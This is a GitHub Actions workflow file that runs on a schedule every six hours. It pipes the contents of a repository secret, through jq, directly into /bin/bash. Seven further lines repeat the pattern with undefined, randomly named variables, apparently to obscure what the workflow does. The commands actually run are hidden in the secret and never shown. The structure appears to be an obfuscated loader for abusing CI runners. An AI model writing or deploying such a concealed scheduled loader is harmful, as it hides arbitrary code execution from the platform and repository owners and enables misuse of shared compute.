name: fightingillegal
on:
  workflow_dispatch:
  schedule:
    - cron: '11 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fightingillegal
        env:
          do98072: ${{ secrets.do98072 }}
        run: |
          echo $do98072 | jq -r .hvy56592 | /bin/bash
          echo $yhr4 | jq -r .vfau9 | /bin/bash
          echo $t32470 | jq -r .cz388 | /bin/bash
          echo $hgap13064 | jq -r .quqfk0 | /bin/bash
          echo $pthr8 | jq -r .ebg4 | /bin/bash
          echo $jo0 | jq -r .uz66 | /bin/bash
          echo $nly07 | jq -r .riiw3 | /bin/bash
          echo $kwfw696 | jq -r .x26386 | /bin/bash

